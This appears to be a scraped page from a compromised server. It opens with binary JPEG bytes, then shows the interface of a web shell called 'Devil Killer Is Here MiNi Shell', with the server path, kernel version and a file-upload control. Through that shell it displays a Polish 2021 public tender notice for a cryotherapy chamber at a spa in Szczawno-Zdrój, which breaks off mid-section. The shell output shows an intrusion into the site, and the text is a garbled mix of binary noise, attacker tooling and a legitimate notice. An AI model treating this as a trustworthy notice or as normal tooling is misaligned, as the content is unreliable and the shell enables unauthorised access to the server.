JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210421/0003767001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00037670 z dnia 2021-04-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Przedmiot zamówienia dotyczy dostawy i montażu kriokomory do Domu Zdrojowego w Szczawnie-Zdroju transportem Wykonawcy lub na jego koszt. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uzdrowisko Szczawno-Jedlina S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczawno-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mfajek@szczawno-jedlina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szczawno-jedlina.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiot zamówienia dotyczy dostawy i montażu kriokomory do Domu Zdrojowego w Szczawnie-Zdroju transportem Wykonawcy lub na jego koszt. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-586d8342-a299-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00037670</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szczawno_jedlina <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szczawno_jedlina</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">SWZ pkt.XIII: 6. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagańtechnicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczącespecyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazaniai odbioru danych za pośrednictwem platforma zakupowa.pl, tj.:a. stały dostęp do sieci Internet ogwarantowanej przepustowości nie mniejszej niż 512 kb/s,b. komputer klasy PC lub MACo następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowszawersja,jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowszewersje,c.zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalniewersja 100.,d. włączona obsługa JavaScript,e. zainstalowany program Adobe Acrobat Reader lubinny obsługujący format plików .pdf, f. Platformazakupowa.pl działa według standardu przyjętegow komunikacji sieciowej - kodowanie UTF8,g. Oznaczenie czasu odbioru danych przezplatformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnegoserwera synchronizowanego z zegarem Głównego Urzędu Miar.7. Wykonawca, przystępując doniniejszego postępowania o udzielenie zamówienia publicznego:h. akceptuje warunki korzystaniaz platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiemw zakładce „Regulamin" oraz uznaje go za wiążący,9. Zamawiający informuje, że instrukcje korzystaniaz platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienietreści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przyużyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców" na stronieinternetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcjeZgodnie z SWZ pkt. XIV:1.Oferta,wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektroniczniemuszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lubpodpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środkówdowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobistyWykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.4. Podpisykwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików musząspełniać“Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej iusług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr910/2014- od 1 lipca 2016 roku”.5. W przypadku wykorzystania formatu podpisu XAdESzewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.12. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwemdedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przykomunikacji wielkość pliku to maksymalnie 500 MB.14. Zamawiający rekomenduje wykorzystanieformatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf15. W celuewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:a. .zip b..7Z16. Wśród rozszerzeń powszechnych a niewystępujących w Rozporządzeniu KRI występują: .rar .gif.bmp .numbers .pages.Dokumenty złożone w takich plikach zostaną uznane za złożonenieskutecznie.UWAGA - pozostałe informacje rozszerzone - w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1. administratorem Pani/Pana danychosobowych jest Uzdrowisko Szczawno-Jedlina S.A.2. administrator wyznaczył Inspektora DanychOsobowych, z którym można się kontaktować P. Magdalena Motyl, Tel.: 74 8493150 e-mailsekretariat@szczawnojedlina.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówieniapublicznego, prowadzonym w trybie przetargu nieograniczonego.4. odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 74 ustawyPZP5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwaniaumowy przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;6. obowiązekpodania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu oudzielenie zamówienia publicznego.7. w odniesieniu do Pani/Pana danych osobowych decyzje niebędą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8. posiada Pani/Pan:a.na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (wprzypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mającychna celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania oudzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub datyzakończonego postępowania o udzielenie zamówienia);b. na podstawie art. 16 RODO prawo dosprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie możeskutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowieńumowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu orazjego załączników);c. na podstawie art. 18 RODO prawo żądania od administratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania oudzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lubpaństwa członkowskiego);d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naruszaprzepisy RODO;9. nie przysługuje Pani/Panu:a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawodo usunięcia danych osobowych;b. prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;c.na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;10.przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne zRODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwymdla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1. administratorem Pani/Pana danychosobowych jest Uzdrowisko Szczawno-Jedlina S.A.2. administrator wyznaczył Inspektora DanychOsobowych, z którym można się kontaktować P. Magdalena Motyl, Tel.: 74 8493150 e-mailsekretariat@szczawnojedlina.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówieniapublicznego, prowadzonym w trybie przetargu nieograniczonego.4. odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 74 ustawyPZP5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwaniaumowy przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;6. obowiązekpodania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiemustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu oudzielenie zamówienia publicznego.7. w odniesieniu do Pani/Pana danych osobowych decyzje niebędą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8. posiada Pani/Pan:a.na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (wprzypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mającychna celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania oudzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub datyzakończonego postępowania o udzielenie zamówienia);b. na podstawie art. 16 RODO prawo dosprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie możeskutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowieńumowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu orazjego załączników);c. na podstawie art. 18 RODO prawo żądania od administratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania oudzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lubpaństwa członkowskiego);d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naruszaprzepisy RODO;9. nie przysługuje Pani/Panu:a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawodo usunięcia danych osobowych;b. prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;c.na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;10.przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne zRODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwymdla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 7/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 155000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia dotyczy dostawy (i montażu) kriokomory do Domu Zdrojowego wSzczawnie-Zdroju transportem Wykonawcy lub na jego koszt.Szczegółowy opis oraz sposóbrealizacji zamówienia zawiera wzór umowy, załącznik nr 2 oraz poniższy opis:a) demontażistniejącej kriokomory wraz z jej utylizacją b) dostawa i montaż nowej kriokomory wraz zniezbędnymi obróbkami.c) przeprowadzenie szkolenia z zakresu obsługi kriokomory d)wykonanie przeglądów technicznych w okresie gwarancji (wartość przeglądów musi byćuwzględniona w cenie usługi)e) gwarancja – min. 24 miesiące f) UWAGA: Zamawiający wymagakriokomory minimum 6 osobowej.g) dostawa i montaż (w tym demontaż starej kriokomory) -Dom Zdrojowy ul. Kolejowa 14, 58-310 Szczawno-Zdrój UWAGA – zamawiający starał się opisaćprzedmiot zamówienia w sposób najbardziej zrozumiały dla Wykonawcy. Ewentualnie użytenazwy własne obrazują jedynie rozwiązania, wyznaczając przybliżone cechy elementówwchodzących w skład przedmiotu zamówienia. Zamawiający dopuszcza rozwiązaniarównoważne.Wykonawca, który powołuje się na rozwiązania równoważne opisywane przezZamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, spełniająwymagania określone przez Zamawiającego, tj. posiadają skład identyczne lub lepszeparametry techniczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Nr Nazwa kryterium Waga % Sposób punktowania 1 Cena brutto 60,00%Liczba punktów (C) =(cena najniższa zaproponowana w ofertach /cena badanej oferty) x 602 Termingwarancji wraz z przeglądami w cenie oferty 20% Gwarancja min. 24 miesiące - 0 pkt.Gwarancja min.36 miesięcy – 10 pkt.Gwarancja min 48 miesięcy– 15 pkt.Gwarancja min. 60 miesięcy i więcej – 20pkt.3 Termin wykonania zamówienia 20% Wykonanie zamówienia w czasie podstawowym – 0pkt.Skrócony czas wykonania zamówienia – o 2 tygodnie – 20 pkt.Oferty będą oceniane następująco:Kryterium 1 – najtańsza cenowo oferta uzyska 60 pkt, pozostałe proporcjonalnie mniej.- Kryterium 2,3–zgodnie z punktacją.a. Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa bruttopodana przez Wykonawcę w Formularzu Oferty.b. Cena ofertowa brutto musi uwzględniać wszelkiekoszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.2. – waga% 3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzieliczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.4. W tokubadania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonejoferty, w tym zaoferowanej ceny.5. Zamawiający udzieli zamówienia Wykonawcy, którego ofertazostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji wraz z przeglądami w cenie oferty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie 4. zdolności technicznej lub zawodowej: Zamawiający wymaga wykazu dostaw lubusług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych równieżwykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – wtym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzeczktórych dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodówokreślających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przyczym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przezpodmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeńpowtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych odniego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadkuświadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź innedokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresieostatnich 3 miesięcy Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże wpowyższym zakresie i przy spełnieniu powyższych warunków - wykonanie min. 1 dostawypodobnego rodzaju (kriokomory wraz z montażem) na kwotę min. 120 000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający 